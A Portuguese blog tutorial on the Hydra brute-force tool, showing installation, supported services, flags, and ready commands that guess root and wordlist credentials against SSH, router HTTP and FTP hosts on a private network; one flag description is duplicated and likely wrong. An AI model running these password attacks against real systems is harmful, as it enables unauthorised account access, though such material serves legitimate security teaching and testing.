Pessoal, nesse post irei mostrar um pouco do Hydra, ela é uma excelente ferramenta de brute force desenvolvida por Van Hauser e David Maciejak, ela cobre uma enorme quantidade de serviços que podem ser alvos de brute force, como http, ssh, ftp, mysql entre muitos outros.
O Hydra já vem instalado por padrão no Kali, e tbm pode ser instalado via apt-get:
# apt-get install hydra hydra-gtk
Caso você deseje compilar o pacote para ter a última versão siga os passos seguintes, primeiro iremos instalar algumas dependências. Estamos utilizando o Ubuntu server 14.04 aqui.
# apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncurses5-dev
Depois baixe a última versão do Hydra:
# wget https://www.thc.org/releases/hydra-8.0.tar.gz
Agora descompacte e entre no diretório:
# tar -xvzf hydra-8.0.tar.gz && cd hydra-8.0
Depois compile e instale:
# ./configure
# make
# make install
# make
# make install
Pronto com seu Hydra instalado vamos conhece-lo, primeiramente vamos dar uma olhada em todos os serviços que o Hydra da suporte, segue a lista abaixo:
asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 [s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Os principais parâmetros são:
- -s Define a porta de destino
- -l Define o usuário de acesso
- -L Define o arquivo de wordlist de usuários
- -p Define a senha
- -P Define o arquivo de wordlist de senhas
- -M Define o arquivo de wordlist de alvos
- -t Define o número de conexões em paralelo, default 16
- -f Faz o hydra parar quando o primeiro user/password é encontrado
- -s Conecta via ssl
- -vV Define modo verbose
Para fazer um teste básico no serviço de ssh execute:
# hydra -s 22 -l root -p popai123 192.168.0.53 ssh
Para trocar a porta padrão do ssh e adicionar uma wordlist faça:
# hydra -s 6254 -l root -P /home/guiadoti/passwd.txt -t 64 192.168.0.44 ssh
Você pode setar ambas wordlists e definir um “mode insano” mas parar no primeiro resultado:
# hydra -s 6548 -L /home/guiadoti/users.txt -P /home/guiadoti/passwd.txt -t 256 -f -vV 192.168.0.66 ssh
A lógica para outros serviços é a mesma, veja um exemplo de brute force no router:
# hydra -s 80 -L /home/guiadoti/users.txt -P /home/guiadoti/passwd.txt -t 256 -f -vV 192.168.0.1 http
Agora em um servidor FTP:
# hydra -s 21 -L /home/guiadoti/users.txt -P /home/guiadoti/passwd.txt -f -vV 192.168.0.33 ftp
É isso ai pessoal, espero que curtem e que usem com moderação, não saiam fazendo merda por ai, lembrem da lei carolina dieckmann…suhaushas. Até mais.
Nenhum comentário:
Postar um comentário